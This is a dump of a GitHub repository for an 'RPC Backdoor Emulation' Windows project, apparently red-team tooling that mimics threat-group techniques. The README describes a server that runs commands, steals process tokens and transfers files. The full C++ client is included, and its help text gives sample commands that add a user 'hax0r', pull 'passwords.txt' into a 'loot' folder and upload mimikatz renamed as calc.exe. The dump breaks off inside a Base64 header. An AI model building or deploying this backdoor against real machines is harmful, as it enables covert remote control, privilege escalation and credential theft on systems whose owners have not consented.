├── LICENSE ├── README.md ├── RPC Backdoor.sln ├── RpcClient ├── RpcClient.cpp ├── RpcClient.vcxproj └── RpcClient.vcxproj.user ├── RpcServer ├── Base64.h ├── RpcServer.cpp ├── RpcServer.vcxproj └── RpcServer.vcxproj.user ├── RpcServerDll ├── Base64.h ├── RpcServerDll.vcxproj ├── RpcServerDll.vcxproj.filters ├── RpcServerDll.vcxproj.user ├── dllmain.cpp ├── framework.h ├── pch.cpp └── pch.h ├── RpcServerInterface ├── RpcServerInterface.acf ├── RpcServerInterface.h ├── RpcServerInterface.idl ├── RpcServerInterface.user ├── RpcServerInterface.vcxproj ├── RpcServerInterface_c.c └── RpcServerInterface_s.c ├── RpcServerInterface2 ├── RpcServerInterface2.acf ├── RpcServerInterface2.h ├── RpcServerInterface2.idl ├── RpcServerInterface2.vcxproj ├── RpcServerInterface2.vcxproj.user ├── RpcServerInterface2_c.c └── RpcServerInterface2_s.c └── RpcSharpClient ├── App.config ├── ILMerge.props ├── ILMergeOrder.txt ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── RpcSharpClient.csproj ├── RpcSharpClient.csproj.user ├── fa161e81-6e93-4f41-961c-ee9c2e75de17_1.0.cs └── packages.config /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Elad Shamir 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # RPC Backdoor Emulation 2 | 3 | This project is a basic implementation of an "RPC Backdoor" meant to emulate TTPs used by certain groups. 4 | 5 | The project contains an RPC server with five functions: 6 | * Execute a command with `cmd.exe /c` and the `CreateProcess` API call. 7 | * Steal a token and execute a command with `cmd.exe /c` and the `CreateProcessWithTokenW` API call. 8 | * Download a file from the remote host. 9 | * Upload a file to the remote host. 10 | * Terminate the RPC server. 11 | 12 | The server is implemented both as an executable (RpcServer) and a DLL (RpcServerDll). 13 | 14 | The server registers two RPC servers: 15 | 1. RPC over named pipes with the hard-coded pipe name "ncacn_np". 16 | 2. RPC over TCP/IP with the hard-coded port number 4747. 17 | 18 | The client is implemented both as a native executable (RpcClient) and a .NET executable (RpcSharpClient). 19 | 20 | -------------------------------------------------------------------------------- /RPC Backdoor.sln: -------------------------------------------------------------------------------- 1 | Microsoft Visual Studio Solution File, Format Version 12.00 2 | # Visual Studio Version 17 3 | VisualStudioVersion = 17.2.32630.192 4 | MinimumVisualStudioVersion = 10.0.40219.1 5 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcServer", "RpcServer\RpcServer.vcxproj", "{758DB128-9123-4E1B-A6C3-47323714123A}" 6 | EndProject 7 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcClient", "RpcClient\RpcClient.vcxproj", "{758DB129-9123-4E1B-A6C3-47323714123A}" 8 | ProjectSection(ProjectDependencies) = postProject 9 | {758DB128-9123-4E1B-A6C3-47323714123A} = {758DB128-9123-4E1B-A6C3-47323714123A} 10 | EndProjectSection 11 | EndProject 12 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcServerInterface", "RpcServerInterface\RpcServerInterface.vcxproj", "{6536EBEC-014E-4D6B-97BE-223137694CA8}" 13 | EndProject 14 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcServerInterface2", "RpcServerInterface2\RpcServerInterface2.vcxproj", "{8558952E-C76B-4976-949F-76A977DA7F8A}" 15 | EndProject 16 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "RpcSharpClient", "RpcSharpClient\RpcSharpClient.csproj", "{0ABB9F2A-6913-4174-9431-851F9D3E94B4}" 17 | EndProject 18 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "RpcServerDll", "RpcServerDll\RpcServerDll.vcxproj", "{3C21F82B-B958-457A-82BB-B8A795316D3D}" 19 | EndProject 20 | Global 21 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 22 | Debug|Any CPU = Debug|Any CPU 23 | Debug|Win32 = Debug|Win32 24 | Debug|x64 = Debug|x64 25 | Release|Any CPU = Release|Any CPU 26 | Release|Win32 = Release|Win32 27 | Release|x64 = Release|x64 28 | EndGlobalSection 29 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 30 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|Any CPU.ActiveCfg = Debug|x64 31 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|Any CPU.Build.0 = Debug|x64 32 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|Win32.ActiveCfg = Debug|Win32 33 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|Win32.Build.0 = Debug|Win32 34 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|x64.ActiveCfg = Debug|x64 35 | {758DB128-9123-4E1B-A6C3-47323714123A}.Debug|x64.Build.0 = Debug|x64 36 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|Any CPU.ActiveCfg = Release|x64 37 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|Any CPU.Build.0 = Release|x64 38 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|Win32.ActiveCfg = Release|Win32 39 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|Win32.Build.0 = Release|Win32 40 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|x64.ActiveCfg = Release|x64 41 | {758DB128-9123-4E1B-A6C3-47323714123A}.Release|x64.Build.0 = Release|x64 42 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|Any CPU.ActiveCfg = Debug|x64 43 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|Any CPU.Build.0 = Debug|x64 44 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|Win32.ActiveCfg = Debug|Win32 45 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|Win32.Build.0 = Debug|Win32 46 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|x64.ActiveCfg = Debug|x64 47 | {758DB129-9123-4E1B-A6C3-47323714123A}.Debug|x64.Build.0 = Debug|x64 48 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|Any CPU.ActiveCfg = Release|x64 49 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|Any CPU.Build.0 = Release|x64 50 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|Win32.ActiveCfg = Release|Win32 51 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|Win32.Build.0 = Release|Win32 52 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|x64.ActiveCfg = Release|x64 53 | {758DB129-9123-4E1B-A6C3-47323714123A}.Release|x64.Build.0 = Release|x64 54 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|Any CPU.ActiveCfg = Debug|x64 55 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|Any CPU.Build.0 = Debug|x64 56 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|Win32.ActiveCfg = Debug|Win32 57 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|Win32.Build.0 = Debug|Win32 58 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|x64.ActiveCfg = Debug|x64 59 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Debug|x64.Build.0 = Debug|x64 60 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|Any CPU.ActiveCfg = Release|x64 61 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|Any CPU.Build.0 = Release|x64 62 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|Win32.ActiveCfg = Release|Win32 63 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|Win32.Build.0 = Release|Win32 64 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|x64.ActiveCfg = Release|x64 65 | {6536EBEC-014E-4D6B-97BE-223137694CA8}.Release|x64.Build.0 = Release|x64 66 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|Any CPU.ActiveCfg = Debug|x64 67 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|Any CPU.Build.0 = Debug|x64 68 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|Win32.ActiveCfg = Debug|Win32 69 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|Win32.Build.0 = Debug|Win32 70 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|x64.ActiveCfg = Debug|x64 71 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Debug|x64.Build.0 = Debug|x64 72 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|Any CPU.ActiveCfg = Release|x64 73 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|Any CPU.Build.0 = Release|x64 74 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|Win32.ActiveCfg = Release|Win32 75 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|Win32.Build.0 = Release|Win32 76 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|x64.ActiveCfg = Release|x64 77 | {8558952E-C76B-4976-949F-76A977DA7F8A}.Release|x64.Build.0 = Release|x64 78 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 79 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|Any CPU.Build.0 = Debug|Any CPU 80 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|Win32.ActiveCfg = Debug|Any CPU 81 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|Win32.Build.0 = Debug|Any CPU 82 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|x64.ActiveCfg = Debug|Any CPU 83 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Debug|x64.Build.0 = Debug|Any CPU 84 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|Any CPU.ActiveCfg = Release|Any CPU 85 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|Any CPU.Build.0 = Release|Any CPU 86 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|Win32.ActiveCfg = Release|Any CPU 87 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|Win32.Build.0 = Release|Any CPU 88 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|x64.ActiveCfg = Release|Any CPU 89 | {0ABB9F2A-6913-4174-9431-851F9D3E94B4}.Release|x64.Build.0 = Release|Any CPU 90 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|Any CPU.ActiveCfg = Debug|x64 91 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|Any CPU.Build.0 = Debug|x64 92 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|Win32.ActiveCfg = Debug|Win32 93 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|Win32.Build.0 = Debug|Win32 94 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|x64.ActiveCfg = Debug|x64 95 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Debug|x64.Build.0 = Debug|x64 96 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|Any CPU.ActiveCfg = Release|x64 97 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|Any CPU.Build.0 = Release|x64 98 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|Win32.ActiveCfg = Release|Win32 99 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|Win32.Build.0 = Release|Win32 100 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|x64.ActiveCfg = Release|x64 101 | {3C21F82B-B958-457A-82BB-B8A795316D3D}.Release|x64.Build.0 = Release|x64 102 | EndGlobalSection 103 | GlobalSection(SolutionProperties) = preSolution 104 | HideSolutionNode = FALSE 105 | EndGlobalSection 106 | GlobalSection(ExtensibilityGlobals) = postSolution 107 | SolutionGuid = {23E0E8DF-5039-4DA6-87B4-B963A6DD4868} 108 | EndGlobalSection 109 | EndGlobal 110 | -------------------------------------------------------------------------------- /RpcClient/RpcClient.cpp: -------------------------------------------------------------------------------- 1 | // File RpcClient.cpp 2 | #include 3 | #include 4 | 5 | #include "../RpcServerInterface/RpcServerInterface.h" 6 | #include "../RpcServer/Base64.h" 7 | 8 | 9 | void SaveFile(LPSTR path, char* buffer) 10 | { 11 | // Base64 decode the data 12 | macaron::Base64 encoder; 13 | char* decoded; 14 | int length; 15 | length = encoder.Decode(buffer, &decoded); 16 | 17 | // Save the data to the specified path 18 | std::ofstream ofs(path, std::ios::out | std::ios::binary); 19 | ofs.write(decoded, length); 20 | ofs.close(); 21 | } 22 | 23 | static char* ReadFile(LPSTR filename, int* length) 24 | { 25 | size_t size; 26 | 27 | // Open the file 28 | std::ifstream ifs(filename, std::ios::in | std::ios::binary | std::ios::ate); 29 | if (!ifs.is_open()) 30 | { 31 | *length = -1; 32 | return NULL; 33 | } 34 | 35 | // Get the file size 36 | ifs.seekg(0, std::ios::end); 37 | size = ifs.tellg(); 38 | ifs.seekg(0, std::ios::beg); 39 | char* pChars = new char[size]; 40 | 41 | // Read all bytes 42 | ifs.read(pChars, size); 43 | 44 | // Close the file and return the length 45 | ifs.close(); 46 | *length = size; 47 | 48 | // Base64 encode the content before returning it 49 | std::string encoded = pChars; 50 | macaron::Base64 encoder; 51 | encoded = encoder.Encode(pChars, *length); 52 | pChars = strdup(encoded.c_str()); 53 | 54 | return pChars; 55 | } 56 | 57 | void PrintHelp() 58 | { 59 | printf("RPC Backdoor Emulation\n"); 60 | printf("\n"); 61 | printf("Target information:\n"); 62 | printf(" --protocol\n"); 63 | printf(" Can be 'tcp' for RPC over TCP/IP or 'namedpipe' for RPC over Named Pipes \n"); 64 | printf(" --hostname\n"); 65 | printf(" Specifies the hostname or IP address of the target RPC server\n"); 66 | printf(" --port\n"); 67 | printf(" Specifies the port number of the target RPC server (required for TCP)\n"); 68 | printf(" --pipename\n"); 69 | printf(" Specifies the pipe name of the target RPC server (required for named pipes)\n"); 70 | printf("\n"); 71 | printf("Functions:\n"); 72 | printf(" The function to be executed is passed via the --function argument.\n"); 73 | printf(" The following functions are implemented:\n"); 74 | printf(" * execute\n"); 75 | printf(" * executewithtoken\n"); 76 | printf(" * download\n"); 77 | printf(" * upload\n"); 78 | printf(" * shutdown\n"); 79 | printf(" \n"); 80 | printf(" Execute\n"); 81 | printf(" The execute function executes a command using 'cmd.exe /c ...'.\n"); 82 | printf(" The --command argument is required. If the commands contains any spaces, wrap it in double quotes (\").\n"); 83 | printf(" \n"); 84 | printf(" Execute with token\n"); 85 | printf(" The execute with token function duplicates the token of a given process ID and executes a command using 'cmd.exe /c ...' via the CreateProcessWithTokenW function.\n"); 86 | printf(" The --command argument is required. If the commands contains any spaces, wrap it in double quotes (\").\n"); 87 | printf(" The --pid argument is required. This argument specifies the process ID of which the token will be duplicated. Make sure the RPC server run in a security context with the permissions and privileges required.\n"); 88 | printf(" \n"); 89 | printf(" Download\n"); 90 | printf(" The download function downloads a file from the RPC server and saves it locally. The file is Base64 encoded/decoded in the process.\n"); 91 | printf(" The --remotepath argument specifies the path of the file to be downloaded (used by the server to read the file).\n"); 92 | printf(" The --localpath argument specifies the path of the file to be saved (used by the client to save the file).\n"); 93 | printf("\n"); 94 | printf(" Upload\n"); 95 | printf(" The upload function uploaded a file to the RPC server and saves it remotely. The file is Base64 encoded/decoded in the process.\n"); 96 | printf(" The --remotepath argument specifies the path of the file to be uploaded (used by the server to save the file).\n"); 97 | printf(" The --localpath argument specifies the path of the file to be uploaded (used by the client to read the file).\n"); 98 | printf(" \n"); 99 | printf(" Shutdown\n"); 100 | printf(" The shutdown function instructs the RPC server to terminate the RPC server and exit the thread.\n"); 101 | printf(" \n"); 102 | printf("Examples:\n"); 103 | printf(" Execute a command:\n"); 104 | printf(" RpcClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function execute --command \"net user hax0r /add\"\n"); 105 | printf(" \n"); 106 | printf(" Execute a command with the token of a process with the ID 1220:\n"); 107 | printf(" RpcClient.exe --protocol tcp --hostname 192.168.70.130 --port 4747 --function executewithtoken --command \"net user hax0r /add\" --pid 1220\n"); 108 | printf(" \n"); 109 | printf(" Download a file:\n"); 110 | printf(" RpcClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function download --localpath \"loot\\passwords.txt\" --remotepath \"secrets\\passwords.txt\"\n"); 111 | printf(" \n"); 112 | printf(" Upload a file:\n"); 113 | printf(" RpcClient.exe --protocol namedpipe --hostname 192.168.70.130 --pipename \"\\pipe\\atctl\" --function upload --localpath \"Tools\\mimikatz.exe\" --remotepath \"calc.exe\"\n"); 114 | printf(""); 115 | } 116 | 117 | int main(int argc, char** argv) 118 | { 119 | RPC_STATUS status; 120 | unsigned char* szStringBinding = NULL; 121 | 122 | char* protocol = NULL; 123 | char* pipename = NULL; 124 | char* hostname = NULL; 125 | char* port = NULL; 126 | char* function = NULL; 127 | char* command = NULL; 128 | char* pid = NULL; 129 | char* remotepath = NULL; 130 | char* localpath = NULL; 131 | char* data = NULL; 132 | 133 | // If not enough arguments are provided, print help and exit 134 | if (argc < 2) 135 | { 136 | PrintHelp(); 137 | exit(0); 138 | } 139 | 140 | // Parse command line arguments 141 | for (int i = 1; i < argc; i += 2) 142 | { 143 | // Every flag is expected to be followed by a value 144 | if (i + 1 >= argc) 145 | { 146 | printf("Error: Incorrent number of arguments. See instructions below.\n"); 147 | PrintHelp(); 148 | exit(0); 149 | } 150 | 151 | // Parse all expected arguments 152 | if (strcmp("--protocol", argv[i]) == 0) 153 | { 154 | protocol = strdup(argv[i + 1]); 155 | } 156 | else if (strcmp("--pipename", argv[i]) == 0) 157 | { 158 | pipename = strdup(argv[i + 1]); 159 | } 160 | else if (strcmp("--hostname", argv[i]) == 0) 161 | { 162 | hostname = strdup(argv[i + 1]); 163 | } 164 | else if (strcmp("--port", argv[i]) == 0) 165 | { 166 | port = strdup(argv[i + 1]); 167 | } 168 | else if (strcmp("--function", argv[i]) == 0) 169 | { 170 | function = strdup(argv[i + 1]); 171 | } 172 | else if (strcmp("--command", argv[i]) == 0) 173 | { 174 | command = strdup(argv[i + 1]); 175 | } 176 | else if (strcmp("--pid", argv[i]) == 0) 177 | { 178 | pid = strdup(argv[i + 1]); 179 | } 180 | else if (strcmp("--remotepath", argv[i]) == 0) 181 | { 182 | remotepath = strdup(argv[i + 1]); 183 | } 184 | else if (strcmp("--localpath", argv[i]) == 0) 185 | { 186 | localpath = strdup(argv[i + 1]); 187 | } 188 | else if (strcmp("--data", argv[i]) == 0) 189 | { 190 | data = strdup(argv[i + 1]); 191 | } 192 | } 193 | 194 | // TCP must be accompanied by a hostname and a port 195 | if (strcmp(protocol, "tcp") == 0) 196 | { 197 | if (hostname == NULL || port == NULL) 198 | { 199 | printf("Error: TCP requires providing a hostname/IP address and a port. See instructions below.\n"); 200 | PrintHelp(); 201 | exit(1); 202 | } 203 | else 204 | { 205 | // Generate string binding for TCP/IP 206 | status = RpcStringBindingCompose( 207 | NULL, 208 | (RPC_CSTR)"ncacn_ip_tcp", 209 | (RPC_CSTR)hostname, 210 | (RPC_CSTR)port, 211 | NULL, 212 | &szStringBinding); 213 | } 214 | } 215 | // named pipes must be accompanied by a hostname and a pipename 216 | else if (strcmp(protocol, "namedpipe") == 0) 217 | { 218 | if (pipename == NULL || hostname == NULL) 219 | { 220 | printf("Error: Named pipe requires providing a hostname and a pipe name. See instructions below.\n"); 221 | PrintHelp(); 222 | exit(1); 223 | } 224 | else 225 | { 226 | // Generate string binding for named pipes 227 | status = RpcStringBindingCompose( 228 | NULL, 229 | (RPC_CSTR)"ncacn_np", 230 | (RPC_CSTR)hostname, 231 | (RPC_CSTR)pipename, 232 | NULL, 233 | &szStringBinding); 234 | } 235 | } 236 | if (status) 237 | exit(status); 238 | 239 | // RPC Binding with the binding string 240 | status = RpcBindingFromStringBinding( szStringBinding, &hRpcServerInterfaceBinding); 241 | 242 | if (status) 243 | exit(status); 244 | 245 | RpcTryExcept 246 | { 247 | // The execute call must be accompanied by a command 248 | if (strcmp(function, "execute") == 0) 249 | { 250 | if (command == NULL) 251 | { 252 | printf("Error: The execute command requires providing a command. See instructions below.\n"); 253 | PrintHelp(); 254 | } 255 | else 256 | { 257 | LPSTR output = 0; 258 | std::cout << "[+] Sending Execute command: " << command << std::endl; 259 | Execute(&command, &output); 260 | std::cout << "[+] Execute command result: " << output << std::endl; 261 | } 262 | } 263 | // The executewithtoken call must be accompanied by a command and a pid 264 | else if (strcmp(function, "executewithtoken") == 0) 265 | { 266 | if (command == NULL || pid == NULL) 267 | { 268 | printf("Error: The execute command requires providing a command and a process id (pid). See instructions below.\n"); 269 | PrintHelp(); 270 | } 271 | else 272 | { 273 | LPSTR output = 0; 274 | std::cout << "[+] Sending Execute command: " << command << std::endl; 275 | int processId = atoi(pid); 276 | ExecuteWithToken(&command, processId, &output); 277 | std::cout << "[+] Execute command result: " << output << std::endl; 278 | } 279 | } 280 | // The download call must be accompanied by a localpath and a remotepath 281 | else if (strcmp(function, "download") == 0) 282 | { 283 | if (localpath == NULL || remotepath == NULL) 284 | { 285 | printf("Error: The download command requires providing a remote path (remotepath) for the file to download and a local path (localpath) where the file will be saved. See instructions below.\n"); 286 | PrintHelp(); 287 | } 288 | else 289 | { 290 | LPSTR buffer = 0; 291 | std::cout << "[+] Sending Download command: " << remotepath << std::endl; 292 | Download(&remotepath, &buffer); 293 | std::cout << "[+] Saving to file: " << localpath << "\n"; 294 | SaveFile(localpath, buffer); 295 | } 296 | } 297 | // The upload call must be accompanied by a localpath and a remotepath 298 | else if (strcmp(function, "upload") == 0) 299 | { 300 | if (localpath == NULL || remotepath == NULL) 301 | { 302 | printf("Error: The upload command requires providing a local path (localpath) for the file to upload and a remote path (remotepath) where the file will be saved on the remote system. See instructions below.\n"); 303 | PrintHelp(); 304 | } 305 | else 306 | { 307 | int length = -1; 308 | LPSTR buffer = ReadFile(localpath, &length); 309 | std::cout << "[+] Sending Upload command: " << remotepath << std::endl; 310 | Upload(&remotepath, &buffer); 311 | std::cout << "[+] Upload complete: " << length << " bytes sent" << std::endl; 312 | } 313 | } 314 | // The shutdown call doesn't require any additional arguments 315 | else if (strcmp(function, "shutdown") == 0) 316 | { 317 | Shutdown(); 318 | } 319 | } 320 | RpcExcept(1) 321 | { 322 | std::cerr << "Runtime reported exception " << RpcExceptionCode() << std::endl; 323 | } 324 | RpcEndExcept 325 | 326 | // Free the memory allocated for the string binding 327 | status = RpcStringFree(&szStringBinding); 328 | 329 | if (status) 330 | exit(status); 331 | 332 | // Release the binding handle resources and disconnect from the server 333 | status = RpcBindingFree(&hRpcServerInterfaceBinding); 334 | 335 | if (status) 336 | exit(status); 337 | } 338 | 339 | void* __RPC_USER midl_user_allocate(size_t size) 340 | { 341 | return malloc(size); 342 | } 343 | 344 | void __RPC_USER midl_user_free(void* p) 345 | { 346 | free(p); 347 | } 348 | -------------------------------------------------------------------------------- /RpcClient/RpcClient.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Debug 10 | x64 11 | 12 | 13 | Release 14 | Win32 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {758DB129-9123-4E1B-A6C3-47323714123A} 23 | Win32Proj 24 | RpcClient 25 | 10.0 26 | 27 | 28 | 29 | Application 30 | MultiByte 31 | v143 32 | 33 | 34 | Application 35 | MultiByte 36 | v143 37 | 38 | 39 | Application 40 | MultiByte 41 | v143 42 | 43 | 44 | Application 45 | MultiByte 46 | v143 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | <_ProjectFileVersion>10.0.40219.1 66 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 67 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 68 | true 69 | true 70 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 71 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 72 | false 73 | false 74 | 75 | 76 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 77 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 78 | 79 | 80 | $(SolutionDir)$(Platform)$(Configuration)Exe\ 81 | $(SolutionDir)$(Platform)$(Configuration)Obj\$(ProjectName)\ 82 | 83 | 84 | 85 | Disabled 86 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 87 | true 88 | EnableFastChecks 89 | MultiThreadedDebug 90 | true 91 | true 92 | true 93 | 94 | 95 | Level4 96 | EditAndContinue 97 | 98 | 99 | rpcrt4.lib;%(AdditionalDependencies) 100 | $(OutDir)RpcClient.exe 101 | true 102 | $(OutDir)RpcClient.pdb 103 | Console 104 | MachineX86 105 | 106 | 107 | 108 | 109 | Disabled 110 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 111 | EnableFastChecks 112 | MultiThreadedDebug 113 | true 114 | true 115 | true 116 | 117 | 118 | Level4 119 | ProgramDatabase 120 | 121 | 122 | rpcrt4.lib;%(AdditionalDependencies) 123 | $(OutDir)RpcClient.exe 124 | true 125 | $(OutDir)RpcClient.pdb 126 | Console 127 | 128 | 129 | 130 | 131 | MaxSpeed 132 | OnlyExplicitInline 133 | true 134 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 135 | true 136 | MultiThreaded 137 | true 138 | true 139 | true 140 | true 141 | 142 | 143 | Level4 144 | ProgramDatabase 145 | 146 | 147 | rpcrt4.lib;%(AdditionalDependencies) 148 | $(OutDir)RpcClient.exe 149 | true 150 | Console 151 | true 152 | true 153 | MachineX86 154 | 155 | 156 | 157 | 158 | MaxSpeed 159 | OnlyExplicitInline 160 | true 161 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 162 | true 163 | MultiThreaded 164 | true 165 | true 166 | true 167 | true 168 | 169 | 170 | Level4 171 | ProgramDatabase 172 | 173 | 174 | rpcrt4.lib;%(AdditionalDependencies) 175 | $(OutDir)RpcClient.exe 176 | true 177 | Console 178 | true 179 | true 180 | 181 | 182 | 183 | 184 | 185 | 186 | Level3 187 | Level3 188 | Level3 189 | Level3 190 | 191 | 192 | 193 | 194 | 195 | 196 | 197 | {8558952e-c76b-4976-949f-76a977da7f8a} 198 | 199 | 200 | {6536ebec-014e-4d6b-97be-223137694ca8} 201 | false 202 | 203 | 204 | 205 | 206 | 207 | -------------------------------------------------------------------------------- /RpcClient/RpcClient.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | --method tcp --hostname localhost --port 4747 --function execute --command "powershell.exe" 5 | WindowsLocalDebugger 6 | 7 | 8 | --method tcp --hostname localhost --port 4747 --function execute --command "powershell.exe" 9 | WindowsLocalDebugger 10 | 11 | 12 | --method tcp --hostname localhost --port 4747 --function execute --command "powershell.exe" 13 | WindowsLocalDebugger 14 | 15 | 16 | --method tcp --hostname localhost --port 4747 --function execute --command "powershell.exe" 17 | WindowsLocalDebugger 18 | 19 | -------------------------------------------------------------------------------- /RpcServer/Base64.h: -------------------------------------------------------------------------------- 1 | #ifndef _MACARON_BASE64_H_ 2 | #define _MACARON_BASE64_H_ 3 | 4 | /** 5 | * The MIT License (MIT) 6 | * Copyright (c) 2016 tomykaira 7 | * 8 | * Permission is hereby granted, free of charge, to any person obtaining 9 | * a copy of this software and associated documentation files (the 10 | * "Software"), to deal in the Software without restriction, including 11 | * without limitation the rights to use, copy, modify, merge, publish, 12 | * distribute, sublicense, and/or sell copies of the Software, and to 13 | * permit persons to whom the Software is furnished to do so, subject to 14 | * the following conditions: 15 | * 16 | * The above copyright notice and this permission notice shall be 17 | * included in all copies or substantial portions of the Software. 18 | * 19 | * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, 20 | * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF 21 | * MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND 22 | * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE 23 | * LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION 24 | * OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION 25 | * WITH THE SOFTWARE OR THE USE OR OTHER 